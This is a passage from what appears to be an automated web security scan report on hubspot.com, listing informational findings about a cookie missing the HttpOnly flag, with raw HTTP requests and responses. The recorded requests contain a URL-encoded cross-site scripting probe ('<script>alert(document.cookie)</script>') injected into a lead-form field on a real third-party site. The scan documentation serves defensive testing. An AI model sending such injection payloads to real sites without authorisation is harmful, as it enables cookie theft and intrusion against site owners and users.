fAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 183184
Content-Type: application/x-javascript
Last-Modified: Fri, 25 Feb 2011 01:33:23 GMT
Accept-Ranges: bytes
ETag: "5ecdd1fd8bd4cb1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:20 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

11.109. http://www.hubspot.com/Portals/53/skins/hubspot/app/js/jquery.ui.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/Portals/53/skins/hubspot/app/js/jquery.ui.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Portals/53/skins/hubspot/app/js/jquery.ui.js HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12

Response

HTTP/1.1 200 OK
Content-Length: 366049
Content-Type: application/x-javascript
Last-Modified: Fri, 25 Feb 2011 01:33:24 GMT
Accept-Ranges: bytes
ETag: "d65057fe8bd4cb1:10188"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Sun, 15 May 2011 17:00:20 GMT
Connection: close
Set-Cookie: HUBSPOT130=68228268.20480.0000; path=/

/*!
* jQuery UI 1.8.7
*
* Copyright 2010, AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* http://docs.jquery.com
...[SNIP]...

11.110. http://www.hubspot.com/RadControls/Menu/Skins/Blank/styles.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/RadControls/Menu/Skins/Blank/styles.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT130=68228268.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RadControls/Menu/Skins/Blank/styles.css HTTP/1.1
Host: www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8